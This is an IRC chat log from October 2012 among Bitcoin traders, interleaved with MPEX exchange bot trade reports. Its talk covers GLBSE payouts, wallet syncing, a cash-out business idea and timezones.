02:11:04 [MPEX] [O.BTCUSD.C150T] 15 @ 0.05221673 = 0.7833 BTC [-] Oct 13 02:21:14 assuming nothing new from nef ? Oct 13 02:36:34 [MPEX] [S.MPOE] 22500 @ 0.00031007 = 6.9766 BTC [-] Oct 13 02:49:15 nope, nothing Oct 13 02:55:15 Anyone around? Oct 13 02:57:24 Who would be anyone? Oct 13 02:57:44 :) Oct 13 03:01:52 [MPEX] [S.MPOE] 28500 @ 0.00031027 = 8.8427 BTC [+] Oct 13 03:01:54 [MPEX] [S.MPOE] 27657 @ 0.00031239 = 8.6398 BTC [+] Oct 13 03:08:06 Around what? Oct 13 03:27:54 [MPEX] [S.MPOE] 8100 @ 0.00031211 = 2.5281 BTC [-] Oct 13 03:53:22 [MPEX] [S.MPOE] 45400 @ 0.00031211 = 14.1698 BTC [-] Oct 13 04:18:41 [MPEX] [S.MPOE] 29600 @ 0.00031007 = 9.1781 BTC [-] Oct 13 04:18:43 [MPEX] [S.MPOE] 20900 @ 0.00030953 = 6.4692 BTC [-] Oct 13 04:18:44 [MPEX] [S.MPOE] 10600 @ 0.0003095 = 3.2807 BTC [-] Oct 13 04:33:32 http://trilema.com/2012/heroes-of-newerth/ if anyone feels like a little dota Oct 13 04:34:16 Lol dota Oct 13 04:36:13 yee Oct 13 04:40:48 i wish the bot told if it was liquidity taking or not Oct 13 04:41:05 mircea_popescu: is there an easy way for you to facilitate that ? Oct 13 04:42:13 ya know, waht i said makes no sense Oct 13 04:42:19 none at all Oct 13 04:43:52 [MPEX] [S.MPOE] 8800 @ 0.00031039 = 2.7314 BTC [+] Oct 13 04:45:15 what do you mean smickles? Oct 13 04:55:34 thepulledstring: well, what i meant to say was that I wanted to know if the order which triggered the tx was a buy or a sell Oct 13 04:56:11 what i actually said was tautologes nonsense Oct 13 04:56:15 Yeah, that would be nice Oct 13 04:56:53 Why is there no bitcoin to cash options Oct 13 04:57:04 there arnt'? Oct 13 04:57:31 thepulledstring: if you are in tucson, i'll do a bitcoin for cash or a cash for bitcoin Oct 13 04:57:42 usd or cad or peso only please Oct 13 04:57:45 Like from btc to moneygram Oct 13 04:57:57 like there is money gram to btc Oct 13 04:58:03 i can do that too, most likely Oct 13 04:58:05 but not the other way Oct 13 04:58:19 thepulledstring: do you frequent #bitcoin-otc? Oct 13 04:58:27 that's where this shit happens Oct 13 04:58:37 Yea. But i was thinking of more of a company Oct 13 04:58:51 oh, probably the labor cost is too high Oct 13 04:58:55 that would serve as a liquidity provider Oct 13 04:59:04 ima try it out Oct 13 04:59:08 and moneygram/wu charge high fees anyway Oct 13 04:59:33 certified checks to cash are cheap if you know the right people Oct 13 04:59:36 thepulledstring: you're going to start a moneygram>btc service biz? Oct 13 04:59:47 A couoon business Oct 13 05:00:01 something that is as liquid as cash to dispense for btc Oct 13 05:00:15 something you could bill/expense pay with Oct 13 05:00:24 coupon Oct 13 05:00:26 * Oct 13 05:01:02 couoon was confusing the fuck out of my 2 beer down mind Oct 13 05:01:49 thepulledstring: if your serious about this, do you have a url yet? Oct 13 05:02:01 and Oct 13 05:02:22 do you need help with accounting? Oct 13 05:03:13 (and i'm actually in process of launching my own accounting company) Oct 13 05:03:43 This is a drunk idea. Buut it would be more of an acquiring/merchant service to solve liquidity for expenses Oct 13 05:04:22 People seem to need easy access to liquidating coins to pay expenses Oct 13 05:06:46 well, it sounds viable to me. but i know, any busines which intends to keep operating long needs a couple of things Oct 13 05:06:49 a lawyer Oct 13 05:06:53 and an accountant Oct 13 05:07:07 (at least in 'merica) Oct 13 05:07:46 both of which can, in some cases, only be needed at the beginning. Oct 13 05:07:55 sort've to get you going Oct 13 05:08:57 [MPEX] [S.MPOE] 17281 @ 0.00031239 = 5.3984 BTC [+] Oct 13 05:34:15 [MPEX] [S.MPOE] 30662 @ 0.00031239 = 9.5785 BTC [+] Oct 13 05:34:17 [MPEX] [S.MPOE] 8038 @ 0.00031263 = 2.5129 BTC [+] Oct 13 05:39:17 smickles huh ? Oct 13 05:39:27 zactly Oct 13 05:39:43 lol k Oct 13 05:40:11 < smickles> thepulledstring: well, what i meant to say was that I wanted to know if the order which triggered the tx was a buy or a sell Oct 13 05:40:14 01:56 < smickles> what i actually said was tautologes nonsense Oct 13 05:40:39 i don't even think i spelled toautologes correctly Oct 13 05:40:40 hm. you can usually tell by price neh ? Oct 13 05:40:50 tautologuous i'd guess. Oct 13 05:41:06 mircea_popescu: only if i'm keeping track of the price of the given asset/option Oct 13 05:41:17 if you care enough to want to know you are, neh ? Oct 13 05:41:21 am i missing something ? Oct 13 05:41:26 it's not all that important ;) Oct 13 05:42:02 there is a gap between wanting to know, and wanting to exert the effort to know in 'merica Oct 13 05:42:39 and as you know, they call me a 'merican Oct 13 05:42:47 lolk Oct 13 05:43:01 the report assbot puts in is already kinda reminescent of an xmas tree Oct 13 05:43:15 rdponticelli wantes ti too tho Oct 13 05:43:22 *it Oct 13 05:44:36 ok, is it that i've had a couple, or that i'm atheist that i don't understand how the bot resembles an xmas tree? Oct 13 05:45:45 (funny how the sometimes aceptable mystype "ti" didn't pass my correction dector, but 'wantes' flew right thru. Oct 13 06:00:12 [MPEX] [S.MPOE] 5200 @ 0.00031181 = 1.6214 BTC [-] Oct 13 06:00:13 [MPEX] [S.MPOE] 60800 @ 0.0003107 = 18.8906 BTC [-] Oct 13 06:03:04 smickles as in, charged with a lot of decorations Oct 13 06:03:17 and whats a dector Oct 13 06:25:59 [MPEX] [S.BVPS] 69 @ 0.00316891 = 0.2187 BTC [-] Oct 13 06:51:00 [MPEX] [S.MPOE] 3700 @ 0.0003107 = 1.1496 BTC [-] Oct 13 06:51:02 [MPEX] [S.MPOE] 58000 @ 0.00030981 = 17.969 BTC [-] Oct 13 06:57:52 mircea_popescu: I just noticed this announcement from April: https://bitcointalk.org/index.php?topic=76926.0 . Are you still paying interest on balances? Oct 13 07:03:16 smickles still around? Oct 13 07:03:46 who summons the almighty smickles from his slumber? Oct 13 07:03:51 LOUD NOISES Oct 13 07:05:12 jcpham = smickles? Oct 13 07:05:26 probably not Oct 13 07:05:35 unless you want me to be Oct 13 07:05:40 $$$ Oct 13 07:16:26 [MPEX] [S.MPOE] 19600 @ 0.00030981 = 6.0723 BTC [-] Oct 13 07:41:34 [MPEX] [S.MPOE] 55983 @ 0.00030932 = 17.3167 BTC [-] Oct 13 07:41:35 [MPEX] [S.MPOE] 5117 @ 0.00030908 = 1.5816 BTC [-] Oct 13 08:06:37 [MPEX] [S.MPOE] 44771 @ 0.00030908 = 13.8378 BTC [-] Oct 13 08:32:24 [MPEX] [S.MPOE] 9212 @ 0.00030908 = 2.8472 BTC [-] Oct 13 08:32:25 [MPEX] [S.MPOE] 39300 @ 0.000309 = 12.1437 BTC [-] Oct 13 08:32:27 [MPEX] [S.MPOE] 13841 @ 0.000309 = 4.2769 BTC [-] Oct 13 08:32:27 [MPEX] [S.MPOE] 6147 @ 0.00030898 = 1.8993 BTC [-] Oct 13 08:36:34 ;;later tell maximian no, it ended i think in june ? or julu Oct 13 08:36:36 The operation succeeded. Oct 13 08:58:31 [MPEX] [S.MPOE] 28400 @ 0.00030974 = 8.7966 BTC [+] Oct 13 09:23:43 [MPEX] [S.MPOE] 20325 @ 0.00030974 = 6.2955 BTC [+] Oct 13 09:23:45 [MPEX] [S.MPOE] 56100 @ 0.00030985 = 17.3826 BTC [+] Oct 13 09:23:46 [MPEX] [S.MPOE] 275 @ 0.00031036 = 0.0853 BTC [+] Oct 13 09:26:04 [MPEX] [B.MPCD.B] 106000 @ 0.0009495 = 100.647 BTC [-] Oct 13 09:51:10 [MPEX] [S.MPOE] 56944 @ 0.00031036 = 17.6731 BTC [+] **** BEGIN LOGGING AT Sat Oct 13 20:40:39 2012 Oct 13 20:42:01 so i have like 200 recive address in my address book Oct 13 20:42:12 lets say i send 1000 to an oldish address Oct 13 20:42:14 soo what's new Oct 13 20:42:24 it should still show up in the wallet right? Oct 13 20:43:59 anyway have knowledge about this? Oct 13 20:44:09 ofcourse it'll show up. Oct 13 20:44:38 im missing 1000 btc right now Oct 13 20:45:17 ;;tslb Oct 13 20:45:19 Time since last block: 13 minutes and 29 seconds Oct 13 20:45:28 Chaang-Noi:Are you sure you send it into your address? Oct 13 20:45:44 my other wallet, my recive address Oct 13 20:45:50 Or you made it like those 400 from a while ago? Oct 13 20:46:00 no Oct 13 20:46:12 i learned from that Oct 13 20:46:28 Ok Oct 13 20:46:35 never have sex with two gitrls and try to accept btc... Oct 13 20:46:37 It should show up, then Oct 13 20:46:44 Is the client well connected? Oct 13 20:46:53 no, im having internet issues Oct 13 20:47:17 Check the address in blockchain Oct 13 20:47:27 It should show there Oct 13 20:47:37 he's right. blockchain. Oct 13 20:48:39 [MPEX] [S.MPOE] 54221 @ 0.00031071 = 16.847 BTC [+] Oct 13 20:48:40 [MPEX] [S.MPOE] 75650 @ 0.00031077 = 23.5098 BTC [+] Oct 13 20:48:41 [MPEX] [S.MPOE] 11000 @ 0.00031094 = 3.4203 BTC [+] Oct 13 20:48:43 [MPEX] [S.MPOE] 30296 @ 0.00031095 = 9.4205 BTC [+] Oct 13 20:48:43 [MPEX] [S.MPOE] 76100 @ 0.00031131 = 23.6907 BTC [+] Oct 13 20:48:44 [MPEX] [S.MPOE] 55200 @ 0.00031254 = 17.2522 BTC [+] Oct 13 20:48:45 [MPEX] [S.MPOE] 41081 @ 0.00031257 = 12.8407 BTC [+] Oct 13 20:48:46 [MPEX] [S.MPOE] 6452 @ 0.00031263 = 2.0171 BTC [+] Oct 13 20:49:45 http://blockchain.info/address/14d9FViHJGCu934CQbUF3mWpWSGwQEMmpo Oct 13 20:49:49 i sent 1000 btc there Oct 13 20:49:58 however the client i sent it from is uodating Oct 13 20:50:02 Total Received 356.78 BTC Oct 13 20:50:02 its like a day behind Oct 13 20:50:09 yeah Oct 13 20:50:09 Chaang-Noi a, those never send. Oct 13 20:50:20 it will resend it after it resyncs. Oct 13 20:50:26 well immissing 1000 btc from my other wlalet Oct 13 20:50:33 oh Oct 13 20:50:35 okay Oct 13 20:50:41 damn Oct 13 20:50:43 Well, until the client is updated, it can't know what's the balance Oct 13 20:50:51 a netbook takes forever to sync Oct 13 20:51:00 like ages Oct 13 20:51:14 its really like a block every 30 seconds Oct 13 20:51:38 im doomed to wait :) Oct 13 20:52:19 rdponticelli i think what it does is, it saves a provisional balance somewhere, and goes on that Oct 13 20:52:28 which explains why he's 1k short. it's not "Real" balance. Oct 13 20:53:57 ok Oct 13 20:54:39 ;;tslb Oct 13 20:54:41 Time since last block: 22 minutes and 52 seconds Oct 13 20:55:16 Chaang-Noi: you can try sending the 1k to my wallet address as a test. ;) Oct 13 20:55:27 its gone Oct 13 20:55:37 ;) Oct 13 21:00:42 it hit Oct 13 21:00:52 ;;tslb Oct 13 21:00:54 Time since last block: 29 minutes and 5 seconds Oct 13 21:01:13 this is why ltc Oct 13 21:02:20 ;;tslb Oct 13 21:02:22 Time since last block: 30 minutes and 33 seconds Oct 13 21:08:39 [MPEX] [O.BTCUSD.C100T] 1000 @ 0.16646956 = 166.4696 BTC [-] Oct 13 21:08:53 [MPEX] [O.BTCUSD.C120T] 1000 @ 0.08632677 = 86.3268 BTC [-] Oct 13 21:34:36 [MPEX] [S.MPOE] 32752 @ 0.00030908 = 10.123 BTC [-] Oct 13 22:01:37 [MPEX] [S.MPOE] 5149 @ 0.00030908 = 1.5915 BTC [-] Oct 13 22:01:38 [MPEX] [S.MPOE] 19000 @ 0.00030895 = 5.8701 BTC [-] Oct 13 22:01:40 [MPEX] [S.MPOE] 19611 @ 0.00030874 = 6.0547 BTC [-] Oct 13 22:01:41 [MPEX] [S.MPOE] 17040 @ 0.00030873 = 5.2608 BTC [-] Oct 13 22:22:32 assets-OTC issue #2 :) https://bitcointalk.org/index.php?topic=102010.msg1116762 Oct 13 22:27:09 [MPEX] [S.MPOE] 47791 @ 0.00030873 = 14.7545 BTC [-] Oct 13 22:52:39 [MPEX] [S.MPOE] 2069 @ 0.00030873 = 0.6388 BTC [-] Oct 13 22:52:40 [MPEX] [S.MPOE] 53757 @ 0.00030872 = 16.5959 BTC [-] Oct 13 23:19:25 [MPEX] [S.MPOE] 7143 @ 0.00030872 = 2.2052 BTC [-] Oct 13 23:19:27 [MPEX] [S.MPOE] 10857 @ 0.00030871 = 3.3517 BTC [-] Oct 13 23:21:12 [MPEX] [O.BTCUSD.C120T] 500 @ 0.08385937 = 41.9297 BTC [-] Oct 13 23:46:19 [MPEX] [S.MPOE] 1254 @ 0.00030892 = 0.3874 BTC [+] Oct 13 23:58:01 ;;ident darsie Oct 13 23:58:01 Nick 'darsie', with hostmask 'darsie!~username@91-119-99-61.dynamic.xdsl-line.inode.at', is identified as user darsie, with GPG key id F732FBF3E4219D48, key fingerprint E18FBF4D0EE26522E950A06AF732FBF3E4219D48, and bitcoin address 153MZbMVJcyT1Usc1K5BEroe7zGj4rShy1 Oct 13 23:58:07 ;;getrating darsie Oct 13 23:58:07 Currently authenticated from hostmask darsie!~username@91-119-99-61.dynamic.xdsl-line.inode.at . User darsie, rated since Sun Jul 1 13:42:17 2012. Cumulative rating 13, from 10 total ratings. Received ratings: 9 positive, 1 negative. Sent ratings: 9 positive, 1 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=darsie Oct 14 00:07:52 [MPEX] [S.MPOE] 36446 @ 0.00030892 = 11.2589 BTC [+] Oct 14 00:07:54 [MPEX] [S.MPOE] 69700 @ 0.00031037 = 21.6328 BTC [+] Oct 14 00:07:54 [MPEX] [S.MPOE] 4100 @ 0.00031062 = 1.2735 BTC [+] Oct 14 00:07:55 [MPEX] [S.MPOE] 2094 @ 0.00031263 = 0.6546 BTC [+] Oct 14 00:07:56 [MPEX] [S.MPOE] 73200 @ 0.00031266 = 22.8867 BTC [+] Oct 14 00:07:58 [MPEX] [S.MPOE] 66500 @ 0.0003127 = 20.7946 BTC [+] Oct 14 00:07:59 [MPEX] [S.MPOE] 18400 @ 0.00031271 = 5.7539 BTC [+] Oct 14 00:08:00 [MPEX] [S.MPOE] 65400 @ 0.00031329 = 20.4892 BTC [+] Oct 14 00:08:01 [MPEX] [S.MPOE] 23100 @ 0.0003133 = 7.2372 BTC [+] Oct 14 00:08:02 [MPEX] [S.MPOE] 18300 @ 0.00031337 = 5.7347 BTC [+] Oct 14 00:08:03 [MPEX] [S.MPOE] 73842 @ 0.00031337 = 23.1399 BTC [+] Oct 14 00:08:04 [MPEX] [S.MPOE] 31800 @ 0.00031348 = 9.9687 BTC [+] Oct 14 00:08:04 [MPEX] [S.MPOE] 3800 @ 0.00031364 = 1.1918 BTC [+] Oct 14 00:08:05 [MPEX] [S.MPOE] 23500 @ 0.00031396 = 7.3781 BTC [+] Oct 14 00:08:07 [MPEX] [S.MPOE] 61200 @ 0.0003141 = 19.2229 BTC [+] Oct 14 00:08:08 [MPEX] [S.MPOE] 66985 @ 0.00031419 = 21.046 BTC [+] Oct 14 00:08:09 [MPEX] [S.MPOE] 52958 @ 0.00031433 = 16.6463 BTC [+] Oct 14 00:08:10 [MPEX] [S.MPOE] 52580 @ 0.00031438 = 16.5301 BTC [+] Oct 14 00:08:11 [MPEX] [S.MPOE] 71466 @ 0.00031451 = 22.4768 BTC [+] Oct 14 00:08:12 [MPEX] [S.MPOE] 3629 @ 0.00031458 = 1.1416 BTC [+] Oct 14 00:08:13 [MPEX] [S.MPOE] 72800 @ 0.00031476 = 22.9145 BTC [+] Oct 14 00:08:13 [MPEX] [S.MPOE] 63000 @ 0.00031526 = 19.8614 BTC [+] Oct 14 00:08:14 [MPEX] [S.MPOE] 5600 @ 0.00031534 = 1.7659 BTC [+] Oct 14 00:08:15 [MPEX] [S.MPOE] 77900 @ 0.0003155 = 24.5775 BTC [+] Oct 14 00:08:16 [MPEX] [S.MPOE] 36900 @ 0.00031551 = 11.6423 BTC [+] Oct 14 00:08:17 [MPEX] [S.MPOE] 29000 @ 0.00031555 = 9.151 BTC [+] Oct 14 00:08:18 [MPEX] [S.MPOE] 2900 @ 0.00031561 = 0.9153 BTC [+] Oct 14 00:08:19 [MPEX] [S.MPOE] 55600 @ 0.00031567 = 17.5513 BTC [+] Oct 14 00:08:20 [MPEX] [S.MPOE] 58600 @ 0.00031604 = 18.5199 BTC [+] Oct 14 00:08:21 [MPEX] [S.MPOE] 18400 @ 0.0003161 = 5.8162 BTC [+] Oct 14 00:08:22 [MPEX] [S.MPOE] 71500 @ 0.00031629 = 22.6147 BTC [+] Oct 14 00:08:22 [MPEX] [S.MPOE] 63952 @ 0.00031633 = 20.2299 BTC [+] Oct 14 00:08:23 [MPEX] [S.MPOE] 6700 @ 0.00031636 = 2.1196 BTC [+] Oct 14 00:08:25 [MPEX] [S.MPOE] 35700 @ 0.00031641 = 11.2958 BTC [+] Oct 14 00:08:26 [MPEX] [S.MPOE] 72500 @ 0.00031644 = 22.9419 BTC [+] Oct 14 00:08:27 [MPEX] [S.MPOE] 16070 @ 0.0003165 = 5.0862 BTC [+] Oct 14 00:08:28 [MPEX] [S.MPOE] 12200 @ 0.00031665 = 3.8631 BTC [+] Oct 14 00:08:29 [MPEX] [S.MPOE] 15100 @ 0.00031675 = 4.7829 BTC [+] Oct 14 00:08:30 [MPEX] [S.MPOE] 70677 @ 0.00031676 = 22.3876 BTC [+] Oct 14 00:08:31 [MPEX] [S.MPOE] 10900 @ 0.00031681 = 3.4532 BTC [+] Oct 14 00:08:32 [MPEX] [S.MPOE] 30700 @ 0.00031681 = 9.7261 BTC [+] Oct 14 00:08:33 [MPEX] [S.MPOE] 17600 @ 0.00031695 = 5.5783 BTC [+] Oct 14 00:08:33 [MPEX] [S.MPOE] 78600 @ 0.00031714 = 24.9272 BTC [+] Oct 14 00:08:34 [MPEX] [S.MPOE] 30300 @ 0.00031717 = 9.6103 BTC [+] Oct 14 00:08:35 [MPEX] [S.MPOE] 2805 @ 0.00031719 = 0.8897 BTC [+] Oct 14 00:08:36 [MPEX] [S.MPOE] 10200 @ 0.00031734 = 3.2369 BTC [+] Oct 14 00:08:37 [MPEX] [S.MPOE] 74000 @ 0.00031737 = 23.4854 BTC [+] Oct 14 00:08:38 [MPEX] [S.MPOE] 69700 @ 0.00031744 = 22.1256 BTC [+] Oct 14 00:08:39 [MPEX] [S.MPOE] 62046 @ 0.00031749 = 19.699 BTC [+] Oct 14 00:08:40 [MPEX] [S.MPOE] 64000 @ 0.00031751 = 20.3206 BTC [+] Oct 14 00:08:41 [MPEX] [S.MPOE] 2881 @ 0.0003178 = 0.9156 BTC [+] Oct 14 00:08:42 [MPEX] [S.MPOE] 27500 @ 0.00031805 = 8.7464 BTC [+] Oct 14 00:08:43 [MPEX] [S.MPOE] 64700 @ 0.00031837 = 20.5985 BTC [+] Oct 14 00:08:44 [MPEX] [S.MPOE] 67600 @ 0.00031918 = 21.5766 BTC [+] Oct 14 00:08:45 [MPEX] [S.MPOE] 13300 @ 0.00031941 = 4.2482 BTC [+] Oct 14 00:08:46 [MPEX] [S.MPOE] 11671 @ 0.0003195 = 3.7289 BTC [+] Oct 14 00:08:47 [MPEX] [S.MPOE] 6349 @ 0.00031985 = 2.0307 BTC [+] Oct 14 00:08:48 [MPEX] [S.MPOE] 46307 @ 0.00032078 = 14.8544 BTC [+] Oct 14 00:08:49 [MPEX] [S.MPOE] 27441 @ 0.00032706 = 8.9749 BTC [+] Oct 14 00:08:50 [MPEX] [S.MPOE] 34957 @ 0.0003389 = 11.8469 BTC [+] Oct 14 00:08:51 [MPEX] [S.MPOE] 36161 @ 0.0003422 = 12.3743 BTC [+] Oct 14 00:08:52 [MPEX] [S.MPOE] 16400 @ 0.00034455 = 5.6506 BTC [+] Oct 14 00:08:53 [MPEX] [S.MPOE] 64182 @ 0.00034999 = 22.4631 BTC [+] Oct 14 00:08:54 [MPEX] [S.MPOE] 134303 @ 0.00035 = 47.0061 BTC [+] Oct 14 00:08:55 [MPEX] [S.MPOE] 39194 @ 0.00037582 = 14.7299 BTC [+] Oct 14 00:08:56 [MPEX] [S.MPOE] 31300 @ 0.00037622 = 11.7757 BTC [+] Oct 14 00:08:57 [MPEX] [S.MPOE] 10000 @ 0.00037682 = 3.7682 BTC [+] Oct 14 00:08:58 [MPEX] [S.MPOE] 24860 @ 0.0003785 = 9.4095 BTC [+] Oct 14 00:08:59 [MPEX] [S.MPOE] 28652 @ 0.00037878 = 10.8528 BTC [+] Oct 14 00:09:00 [MPEX] [S.MPOE] 10000 @ 0.0003791 = 3.791 BTC [+] Oct 14 00:09:01 [MPEX] [S.MPOE] 1167867 @ 0.00038 = 443.7895 BTC [+] Oct 14 00:09:14 someone buying a lot of MPOE :) Oct 14 00:11:56 o hey. Oct 14 00:11:59 [MPEX] [S.MPOE] 32468 @ 0.0003815 = 12.3865 BTC [+] Oct 14 00:12:38 maybe nao we can put the entire glbse nuttery behind us and carry on. Oct 14 00:13:44 [MPEX] [S.MPOE] 21623 @ 0.00038231 = 8.2667 BTC [+] Oct 14 00:13:45 [MPEX] [S.MPOE] 38377 @ 0.00038417 = 14.7433 BTC [+] Oct 14 00:14:22 [MPEX] [S.MPOE] 720 @ 0.00038417 = 0.2766 BTC [+] Oct 14 00:14:48 mircea_popescu the legend himself Oct 14 00:15:04 glbse ruined a few companies Oct 14 00:15:12 myea. Oct 14 00:15:16 gigavps still can't payout dividends... Oct 14 00:15:22 i know. Oct 14 00:15:28 and the gigamining bond had the most market depth Oct 14 00:16:08 mirceau_popescu you know smickles? Oct 14 00:23:21 thestringpuller : Oct 14 00:23:24 ;;rated smickles Oct 14 00:23:24 You rated user smickles on Sat Aug 25 08:39:34 2012, giving him a rating of 4, and supplied these additional notes: He's been running MPOE.ETF and releasing THE monthly reports, a model for all Bitcoin financial reporting. Also handled k's of BTC as broker for various clients.. Oct 14 00:24:47 and also why do you call me mirceau and why do you type out the name ? type mi press tab or so Oct 14 00:25:26 just be glad that mircea_popescu doesn't have any weird diacritics Oct 14 00:25:33 or characters, I guess Oct 14 00:25:40 unlike ceausescu Oct 14 00:25:54 is that how you spell it (wrong)? Oct 14 00:26:05 yeah, omg Oct 14 00:26:10 Ceaușescu Oct 14 00:26:23 lol Oct 14 00:26:52 that S thing is more like an english sh, right? Oct 14 00:27:13 or îţâşă Oct 14 00:27:20 whoa Oct 14 00:28:52 http://www.jeg.ro/titlul-mortii/ here's a little poll as to what that should mean lol Oct 14 00:31:19 http://www.youtube.com/watch?feature=player_embedded&v=mLl9Q47e7bQ#! Oct 14 00:31:19 what is she saying? Oct 14 00:32:06 dubious hicks got into an argument, beat each other up. Oct 14 00:32:50 (over some guy) Oct 14 00:33:19 her romanian shocking to romanians cause it is marginally intelligible but sounds like how a sparrow or some other bird'd be speaking it. Oct 14 00:33:47 oh Oct 14 00:36:48 I have money from GLBSE Oct 14 00:36:49 :O Oct 14 00:37:35 smickles: did you get anything yet? Oct 14 00:40:22 Azelphur o hey, it pays out ? Oct 14 00:40:38 yea GLBSE just paid out my balance Oct 14 00:40:39 [MPEX] [S.MPOE] 36800 @ 0.00039093 = 14.3862 BTC [+] Oct 14 00:40:52 pretty cool. so only been like a coupla weeks. Oct 14 00:42:05 hm Oct 14 00:42:08 i got something as well Oct 14 00:42:18 Well, been a real mess, but at least it seems Nefario is honest even if he wussed out because of legal concerns. Oct 14 00:42:18 the number seems to round to be my balance Oct 14 00:42:22 too* Oct 14 00:42:40 id say its more or less, not my balance Oct 14 00:43:26 Eh, what if he's too lazy to type/copy the whole thing and pays out manually and just rounds up to the next bitcent or something Oct 14 00:44:32 Copy pasting is way too much work you know. Oct 14 00:44:33 kakobrekla is it short ? or too much ? Oct 14 00:44:40 dunno Oct 14 00:44:44 BTC-Mining did you receive the more or less correct sum ? Oct 14 00:44:47 dunno what my balance was Oct 14 00:45:04 I'll report when I get paid mine, I rounded it down to the bitcent Oct 14 00:45:16 o, you weren't paid yet ? Oct 14 00:45:41 Nope Oct 14 00:46:14 I think they just got paid out. Mine might arrive soon. Oct 14 00:48:05 aha Oct 14 00:52:30 ya Oct 14 00:52:33 i have 9 conf on it Oct 14 00:53:24 coupla hours then Oct 14 00:54:29 [MPEX] [S.MPOE] 63600 @ 0.00039179 = 24.9178 BTC [+] Oct 14 00:54:31 [MPEX] [S.MPOE] 250 @ 0.0004 = 0.1 BTC [+] Oct 14 00:54:32 [MPEX] [S.MPOE] 15000 @ 0.00041234 = 6.1851 BTC [+] Oct 14 00:54:32 [MPEX] [S.MPOE] 2921150 @ 0.00042 = 1226.883 BTC [+] Oct 14 00:56:03 waitwaitwait. Oct 14 00:56:07 glbse just paid out ? Oct 14 00:56:08 ahahahaha Oct 14 00:57:01 I don't even know what my balance was in GLBSE, I got sent 10.1, it sounds about right Oct 14 00:57:15 hopefully this means smickles has SS data and that can clean up now Oct 14 00:57:35 then I won't be poor any more, yay \o/ Oct 14 00:57:53 good for you. Oct 14 00:58:05 anyway, bbl. Oct 14 01:20:04 [MPEX] [S.MPOE] 37500 @ 0.00041222 = 15.4583 BTC [-] Oct 14 01:24:45 I have not recieved a dime from GLBSE Oct 14 01:35:04 Yeah, I received the spare change I had in glbse Oct 14 01:35:40 Now, it's still missing the important, the asset information Oct 14 01:45:45 [MPEX] [S.MPOE] 900 @ 0.00041698 = 0.3753 BTC [+] Oct 14 01:45:46 [MPEX] [S.MPOE] 56900 @ 0.00041701 = 23.7279 BTC [+] Oct 14 01:45:47 [MPEX] [S.MPOE] 100 @ 0.00042 = 0.042 BTC [+] Oct 14 01:51:11 your funds are welcome on coinbr, you know Oct 14 01:52:12 i was wondering why mpoe is selling Oct 14 01:52:17 then i found out glbse paid out. Oct 14 01:53:51 gsdpt will be interesting, too. i hope deadterra will not sell it all and peruse my offer instead. Oct 14 01:56:03 jurov, nah, I'll just use MPEx directly Oct 14 01:56:27 wow, what's going on with S.MPOE? Oct 14 01:56:46 It went back up? Oct 14 01:57:01 Often does. Oct 14 01:57:29 maximian, apparently because glbse paid back Oct 14 01:57:35 14`391`957 bid at 0.00038150 Oct 14 01:57:59 I see Oct 14 01:58:01 nice volume Oct 14 01:58:19 That requires 5490 BTC to place in escrow for it... Oct 14 01:59:19 And gives you 1.43% of Mpex earnings (14 million / 1000 million shares) Oct 14 01:59:31 anything new happen? Oct 14 01:59:40 well, I'm pleased Oct 14 01:59:45 GLBSE paid a few people? Oct 14 01:59:52 or is that old news for you? Oct 14 02:00:27 I am off to bed and HOPEFULLY tomorrow Ill get paid but not today :( Oct 14 02:12:02 [MPEX] [S.MPOE] 5000 @ 0.00041222 = 2.0611 BTC [-] Oct 14 02:12:03 [MPEX] [S.MPOE] 2573 @ 0.00041195 = 1.0599 BTC [-] Oct 14 02:15:32 I haven't got anything from GLBSE Oct 14 02:17:24 Not everyone has, only a few Oct 14 02:17:40 It's now 3 AM in the UK, guess Nefario would be sleeping by now Oct 14 02:18:26 Hopefully payments will resume tomorrow Oct 14 02:29:03 it's more like 23 than 03 :) Oct 14 02:30:44 erm, sorry... but more like 01:30 Oct 14 02:31:26 ah, no, 0:30 Oct 14 02:31:58 +5 for UK, +6 for France Oct 14 02:32:05 I keep mixing them up Oct 14 02:35:04 We should just all use UTC Oct 14 02:37:16 [MPEX] [S.MPOE] 6200 @ 0.00041008 = 2.5425 BTC [-] Oct 14 02:42:57 I wouldn't mind. Oct 14 02:43:50 Although sundials wouldn't work if we did that... Oct 14 02:44:17 We'd have to replace em Oct 14 02:44:43 THINK OF THE POOR SUNDIALS IN MONUMENTS! Oct 14 02:45:11 Well, you have a point Oct 14 02:45:21 Sundials should be localiced Oct 14 02:46:13 It would clear the confusion for those with a day/night period fitting UTC (Like 0-6 AM, probably sleeping) Oct 14 02:46:47 But we'd still get confused about people in other timezone since we'd still have to calculate what their day/night hours are. Oct 14 02:47:02 But yes, I understand we can't change something no to obsolete some technology which is already obsolete... Oct 14 02:47:35 It's easier with the timezones. Oct 14 02:47:57 I don't know about the last point, I don't care if midnight is 12 or 24 Oct 14 02:48:09 We add +/- timezones and their schedule fits our hours. Oct 14 02:48:16 Easier to figure it out. Oct 14 02:48:54 No, it's not easier when you got a mess everytime you're trying to figure what time is in some other place... Oct 14 02:49:36 But the whole point when checking the time in another time zone is to determine what point of the day they are in. Oct 14 02:50:07 If everyone has the same time, you have to figure what their day/night hours are instead. Oct 14 02:50:30 No, they are more points more importants Oct 14 02:50:39 Like? Oct 14 02:50:52 I receive some mail, or read some post on some forum... Oct 14 02:51:18 They're usually set for your timezone... Oct 14 02:51:37 Not always Oct 14 02:51:54 GLBSE itself didn't support timezones Oct 14 02:52:41 Eh, what do you need timezone for GLBSE for? Oct 14 02:53:34 I'm just say that it would be easy if it was the same hour for everybody at the same time Oct 14 02:54:04 There's a reason why the systems now are configured in UTC Oct 14 02:54:43 Back in the times, they used to be in local time, and it became a mess as soon as they had to share information Oct 14 02:54:59 just popping in for a second, but is my assumption that there has been no new info from GLBSE correct? Oct 14 02:55:32 novusordo: there has been some payments Oct 14 02:55:34 It's incorrect Oct 14 02:55:49 oooh Oct 14 02:55:58 maximian i think that started like a 20mn wall Oct 14 02:56:01 tore though the book Oct 14 02:56:37 BTC-Mining is this turning into a pirate, 23/690 accts paid sorta ordeal ? Oct 14 02:56:50 No idea Oct 14 02:57:28 Quick! Every buying GLBSE's debt! Oct 14 02:57:32 rdponticelli ok, so what hour should it be ? Oct 14 02:57:36 *Everybody Oct 14 02:58:02 mircea_popescu: Any time, I don't care Oct 14 02:58:21 novusordo some people came in and said they were paid. it seemed like it's all paid but now there's also people who haven't, and the ones paid are in the <10btc range Oct 14 02:58:27 But just agree what it is, and move forward Oct 14 02:58:31 so tomorrow brings more certainty. Oct 14 02:58:55 rdponticelli you'll have to get all the old folks who don't even grok the internet accept 